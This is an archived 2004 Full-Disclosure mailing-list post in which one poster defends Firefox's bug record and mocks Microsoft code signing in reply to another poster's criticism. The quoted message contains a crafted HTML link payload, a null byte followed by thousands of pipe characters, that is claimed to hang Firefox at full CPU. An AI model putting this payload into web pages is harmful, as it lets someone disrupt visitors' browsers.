Message-ID: <41C1A403.4060403@easynix.net>
From: devis at easynix.net (devis)
Subject: To anybody who's offended by my disclosure policy-GET THIS GUYS

Rafel Ivgi, The-Insider wrote:

>SkyLined is a great dude. Serious guy!
>He is only worthy of RESPECT and no blame.
>There is no signed law against releasing such information and it's funny
>someone is anyhow talking about this in
>FULL-DISCLOSURE list, whose entire concept is to disclose full details
>about vulnerabilities.
>
>By the way, for all of FireFox fans....FireFox has many open vulnerabilities
>which its vendor refuses to fix. Even after notifying
>and even after 4 months :-)...Moreover, they are just like MS claiming
>certain bugs are not bugs, talking "in the air" and without checking
>and under-blowing risk values. They even don't sign their exe's (which is a
>super minimal protection against man-in-the-middle replacing downloads) so
>microsoft windows can't say it's a valid file from a valid vendor and not a
>virus.
>
>For Example:
><a
>href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
>||||||||||||||||||||||||||||||
>'>test it</a>
>
>This has no effect on I.E......
>Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOUR CPU!!! 100%
>FOREVER...***
>What i am saying is, it is not who codes the software, it is how you do.
>(if i was not in a job working frame, i would be publishing things that will
>cause you all to say it's shit)
>FireFox team claimed it's an old bug.bla bla bla.and has no problem and no
>security risk...bla bla bla... and didn't fix it after 4 months...
>Just like MS when they are not even commercial, then what are they? on the
>way to making money...to be the second size'd market share browser.
>
>GO SKYLINED!
>
>Rafel Ivgi, The-Insider
>Security Consultant
>Malicious Code Research Center (MCRC)
>Finjan Software LTD
>E-mail: rivgi@...jan.com
>---------------------------------
>Prevention is the best cure!
>----- Original Message ----- 
>From: "ph0enix" <ph0enix@...enix.org>
>To: "'Gadi Evron'" <ge@...uxbox.org>
>Cc: "'Berend-Jan Wever'" <skylined@...p.tudelft.nl>;
><full-disclosure@...ts.netsys.com>
>Sent: Saturday, November 27, 2004 5:56 PM
>Subject: Re: [Full-Disclosure] To anybody who's offended by my disclosure
>policy
>  
>

No software is immune from bugs. Explain exactly what point you are
trying to prove here? 4 month old bug? Not being fixed? Considering
the age of code, how many bugs have been fixed, how fast they have done
it, and how many spyware actually take advantage of the brilliant bug you
are posting ( known for ages....use bugzilla, and with no danger of
remote code execution, just crash ), i think the track record of Firefox
is quite exemplary. Please mention another popular browser with such
track history....I'll let you search for a while.

Nobody said Firefox was immune from bugs, and your trolling doesn't
reach far i am afraid. BTW what's the correlation with Skylined's way of
releasing security advisories? Claiming the code base is 'shit' with
'if's' is once again defined as trolling in my world. So get real, the
point is:
- Despite having ( like all software ) some bugs, Firefox is WAYS WAYS
WAYS safer than anything else on Bill Platform. No, it is not a magic
lock of ur MS box, and it may be owned by many other ways. Nobody said
install firefox and relax, but it's already a step forward compared to
daily malware removal. More CPU needed? sure, let's integrate it in
Windows ala iexplore.exe ....

Finally to crush ur trolling, do you just understand what a Digitally
Signed MS app is? It is a lump of money you pay after forwarding your app
to MS, and they will happily give u a receipt for your dollars stating
that this app, on a stock XP install, will not crash your box. NOTHING
MORE. As soon as you are out of the Stock Install, no more warranties are
given. Basically it's hype again, it does not possess anything more than
non digitally signed code. It is designed to have fools like you
thinking they got something for their money. So in that light, i bet
you can start to imagine why Firefox doesn't pay MS to digitally sign
it, even so i bet MS will refuse it.
And you are right, one day AV solutions will exclusively be based on
digital signatures ( *EEEK* ) and soon:

"Norton 2010 has detected a virus on your system:  Firefox.win32"


Finjan ??? Sounds like someone at Redmond...
